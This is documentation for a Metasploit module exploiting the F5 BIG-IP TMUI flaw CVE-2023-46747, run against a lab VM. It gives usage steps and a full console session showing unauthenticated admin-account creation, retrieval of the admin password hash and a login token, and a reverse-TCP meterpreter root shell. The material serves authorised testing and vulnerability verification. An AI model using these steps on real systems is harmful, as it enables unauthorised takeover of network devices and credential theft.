## Vulnerable Application

### Description

This module exploits a flaw in F5's BIG-IP Traffic Management User Interface (TMUI) that enables an external,
unauthenticated attacker to create an administrative user. Once the user is created, the module uses the new account to
execute a command payload. Both the exploit and check methods automatically delete any temporary accounts that are
created.

Tested against the VMware OVA release of 16.1.2.1-0.0.10 and 17.0.0.1-0.0.4.

### Setup

Download BIGIP-17.0.0.1-0.0.4.ALL-vmware.ova and import it into your desired virtualization software.

The target does not need to be licensed to be vulnerable.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/f5_bigip_tmui_rce_cve_2023_46747`
4. Set the `RHOST`, `PAYLOAD` and payload-related options
5. Do: `run`
6. You should get a shell.

## Targets

### Command

This executes an OS command on the target device.

## Options

## Scenarios

### F5 BIG-IP 17.0.0.1-0.0.4

```
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set RHOSTS 192.168.159.32
RHOSTS => 192.168.159.32
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > check
[+] 192.168.159.32:443 - The target is vulnerable.
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[+] Admin user was created successfully. Credentials: UyPzjB - qu0k7MxIzIDlvS
[+] Retrieved the admin hash: $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5tLI9KSSr8M10
[*] Obtained login token: 4TAZKYHLZCHPQX3FC47VWNSEUA
[*] Sending stage (24768 bytes) to 192.168.159.32
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.32:35438) at 2023-11-01 16:36:04 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : f5test2.home.lan
OS           : Linux 3.10.0-862.14.4.el7.ve.x86_64 #1 SMP Thu Jul 14 23:41:24 PDT 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > pwd
/var/service/restjavad
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > creds
Credentials
===========

host            origin          service                   public  private                                                                                              realm  private_type        JtR Format    cracked_password
----            ------          -------                   ------  -------                                                                                              -----  ------------        ----------    ----------------
192.168.159.32  192.168.159.32  443/tcp (F5 BIG-IP TMUI)  admin   $6$gquMefr5$HGA8j7xLzHq2cfZOSudg6g6vETPpHthWOSWJtCtYd1sWRoNGCLnAQKbRvQoRm1QgEm8fC3HfH5t (TRUNCATED)         Nonreplayable hash  sha512,crypt  

msf6 exploit(linux/http/f5_bigip_tmui_rce_cve_2023_46747) > 
```
